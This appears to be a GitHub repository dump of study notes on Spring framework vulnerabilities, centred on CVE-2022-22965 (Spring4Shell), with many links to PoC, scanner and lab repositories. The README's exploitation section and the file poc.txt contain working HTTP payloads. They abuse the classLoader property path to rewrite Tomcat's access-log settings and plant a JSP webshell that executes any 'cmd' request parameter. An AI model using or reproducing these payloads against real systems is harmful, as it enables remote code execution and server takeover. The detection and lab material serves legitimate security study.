├── README.md └── TEMP ├── Spring-beans_RCE漏洞分析.pdf ├── WeChat_20220329225214.mp4 ├── poc.txt ├── spring-rce-poc-master.zip ├── 微信图片_20220329223814.jpg ├── 微信图片_20220329223828.jpg ├── 微信图片_20220329223834.jpg ├── 微信图片_20220329225250.jpg ├── 微信图片_20220329225300.jpg ├── 微信图片_20220329225423.jpg ├── 微信图片_20220329230131.jpg ├── 微信图片_20220329230254.png ├── 微信图片_20220329230315.jpg ├── 微信图片_20220329230324.jpg ├── 微信图片_20220329230628.png ├── 微信图片_20220329230849.jpg ├── 微信图片_20220329232122.jpg ├── 微信图片_20220401143722.jpg ├── 微信图片_20220401143734.jpg ├── 微信图片_20220401143740.jpg ├── 微信图片_20220401143743.jpg └── 核弹级漏洞通告 _ Spring RCE 0day漏洞.pdf /README.md: -------------------------------------------------------------------------------- 1 | # HackSpring-永恒之春 2 | 3 | 本项目用来致敬全宇宙最无敌Spring框架!同时也记录自己在学习Spring漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2022年3月30日,最近的一次更新时间为2022年4月26日。作者:[0e0w](https://github.com/0e0w) 4 | 5 | - [01-Spring基础知识]() 6 | - [02-Spring框架识别]() 7 | - [03-Spring上层建筑]() 8 | - [04-Spring漏洞汇总]() 9 | - [05-Spring检测利用]() 10 | - [06-Spring漏洞修复]() 11 | - [07-Spring分析文章]() 12 | - [08-Spring靶场环境]() 13 | 14 | ## 01-Spring基础知识 15 | 16 | - Spring 17 | - SpringBoot 18 | 19 | ## 02-Spring框架识别 20 | 21 | - https://mp.weixin.qq.com/s/cmkTMw_QS8o1wMsRd0E0XQ 22 | 23 | ## 03-Spring上层建筑 24 | 25 | **Spring + ? = rce !** 26 | 27 | ## 04-Spring漏洞汇总 28 | 29 | - CVE-2022-22965 30 | 31 | ## 05-Spring检测利用 32 | 33 | 如何判断一个网站是否存在Spring漏洞?如何查找内网中存在Sprin漏洞? 34 | 35 | 一、Payload 36 | 37 | ``` 38 | POST / HTTP/1.1 39 | Host: 127.0.0.1:8090 40 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 41 | Accept-Encoding: gzip, deflate 42 | Accept: */* 43 | Connection: close 44 | suffix: %>// 45 | c1: Runtime 46 | c2: <% 47 | DNT: 1 48 | Content-Type: application/x-www-form-urlencoded 49 | Content-Length: 761 50 | 51 | class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 52 | ``` 53 | 54 | 二、源码检测 55 | - https://github.com/webraybtl/springcore_detect 56 | 57 | 三、漏洞验证 58 | 59 | - 测试时发现webshell只能写入一次!第二次失败! 60 | 61 | 四、漏洞扫描 62 | 63 | 五、其他工具 64 | - https://github.com/TheGejr/SpringShell 65 | - https://github.com/BobTheShoplifter/Spring4Shell-POC 66 | - https://github.com/kh4sh3i/Spring-CVE 67 | - https://github.com/GuayoyoCyber/CVE-2022-22965 68 | - https://github.com/viniciuspereiras/CVE-2022-22965-poc 69 | - https://github.com/reznok/Spring4Shell-POC 70 | - https://github.com/jschauma/check-springshell 71 | - https://github.com/colincowie/Safer_PoC_CVE-2022-22965 72 | - https://github.com/alt3kx/CVE-2022-22965 73 | - https://github.com/alt3kx/CVE-2022-22965_PoC 74 | - https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE 75 | - https://github.com/light-Life/CVE-2022-22965-GUItools 76 | - https://github.com/Mr-xn/spring-core-rce 77 | - https://github.com/Kirill89/CVE-2022-22965-PoC 78 | - https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE 79 | - https://github.com/likewhite/CVE-2022-22965 80 | - https://github.com/mebibite/springhound 81 | - https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell 82 | - https://github.com/hktalent/spring-spel-0day-poc 83 | - https://github.com/darryk10/CVE-2022-22963 84 | - https://github.com/WeiJiLab/Spring4Shell-POC 85 | - https://github.com/Corgizz/SpringCloud 86 | - https://github.com/NewBeginning6/spring-Framework-rce 87 | - https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE 88 | - https://github.com/k3rwin/spring-core-rce 89 | - https://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410 90 | - https://github.com/YanMu2020/SpringScan 91 | - https://github.com/wearearima/poc-cve-2018-1273 92 | - https://github.com/metaStor/SpringScan 93 | - https://github.com/fullhunt/spring4shell-scan 94 | - https://github.com/Qualys/spring4scanwin 95 | 96 | ## 06-Spring漏洞修复 97 | 98 | ## 07-Spring分析文章 99 | 100 | - https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html 101 | - https://bugalert.org/content/notices/2022-03-29-spring.html 102 | - https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc 103 | - https://www.springcloud.io/post/2022-03/spring-0day-vulnerability 104 | - https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement 105 | - https://tttang.com/archive/1532 106 | 107 | ## 08-Spring靶场环境 108 | 109 | - https://github.com/jbaines-r7/spring4shell_vulnapp 110 | - https://github.com/Kirill89/CVE-2022-22965-PoC 111 | - https://github.com/DDuarte/springshell-rce-poc 112 | - https://github.com/XuCcc/VulEnv 113 | 114 | [![Stargazers over time](https://starchart.cc//HackJava/Spring.svg)](https://starchart.cc/HackJava/Spring) 115 | 116 | -------------------------------------------------------------------------------- /TEMP/Spring-beans_RCE漏洞分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/Spring-beans_RCE漏洞分析.pdf -------------------------------------------------------------------------------- /TEMP/WeChat_20220329225214.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/WeChat_20220329225214.mp4 -------------------------------------------------------------------------------- /TEMP/poc.txt: -------------------------------------------------------------------------------- 1 | http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%66%75%63%6b%7d%69 2 | http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp 3 | http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.directory=%48%3a%5c%6d%79%4a%61%76%61%43%6f%64%65%5c%73%74%75%70%69%64%52% 4 | http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp 5 | http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 6 | 7 | 8 | 9 | GET /stupidRumor_war_exploded/fuckUUUU HTTP/1.1 10 | Host: 127.0.0.1:8080 11 | User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 12 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 13 | fuck: <%Runtime.getRuntime().exec(request.getParameter("cmd"))%> 14 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 15 | Accept-Encoding: gzip, deflate 16 | Connection: close 17 | Upgrade-Insecure-Requests: 1 18 | Sec-Fetch-Dest: document 19 | Sec-Fetch-Mode: navigate 20 | Sec-Fetch-Site: none 21 | Sec-Fetch-User: ?1 22 | 23 | 24 | 25 | stupidRumor_war_exploded/fuckJsp.jsp -------------------------------------------------------------------------------- /TEMP/spring-rce-poc-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/spring-rce-poc-master.zip -------------------------------------------------------------------------------- /TEMP/微信图片_20220329223814.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329223814.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329223828.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329223828.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329223834.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329223834.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329225250.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329225250.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329225300.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329225300.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329225423.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329225423.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329230131.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230131.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329230254.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230254.png -------------------------------------------------------------------------------- /TEMP/微信图片_20220329230315.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230315.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329230324.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230324.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329230628.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230628.png -------------------------------------------------------------------------------- /TEMP/微信图片_20220329230849.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329230849.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220329232122.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220329232122.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220401143722.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143722.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220401143734.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143734.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220401143740.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143740.jpg -------------------------------------------------------------------------------- /TEMP/微信图片_20220401143743.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/微信图片_20220401143743.jpg -------------------------------------------------------------------------------- /TEMP/核弹级漏洞通告 _ Spring RCE 0day漏洞.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HackJava/Spring/bc684e335714c2198ad2eb842ac4603540680bb7/TEMP/核弹级漏洞通告 _ Spring RCE 0day漏洞.pdf --------------------------------------------------------------------------------